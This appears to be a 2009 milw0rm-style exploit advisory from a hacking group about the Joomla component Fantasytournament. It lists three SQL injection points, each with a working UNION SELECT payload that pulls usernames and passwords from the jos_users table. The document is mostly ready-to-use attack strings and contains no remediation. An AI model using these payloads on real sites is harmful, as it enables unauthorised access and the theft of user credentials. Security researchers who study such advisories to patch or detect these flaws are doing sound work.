#############################################################################
# #
# Joomla Component Fantasytournament Multiple SQL Injection Vulnerabilities #
# #
#############################################################################
########################################
[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]
########################################
[~] ScriptName: "Joomla"
[~] Component: "Fantasytournament (com_fantasytournament)"
[~] Version: "2009.1.5"
[~] Date: "01/01/2009"
[~] Author: "Adrian Gray"
[~] Author E-mail: "a.gray@javalamp.co.uk"
[~] Author URL: "www.graymoose.com"
[~] Component info: "http://extensions.joomla.org/extensions/sports-&-games/sports/1604/details"
########################################
[~] Exploit 1: /index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=[SQL]
[~] Example 1: /index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6+from+jos_users--
########################################
[~] Exploit 2: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=[SQL]
[~] Example 2: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users--
########################################
[~] Exploit 3: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=[SQL]
[~] Example 3: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=-63+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users--
########################################
[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] United States of Albania
########################################
# milw0rm.com [2009-01-14]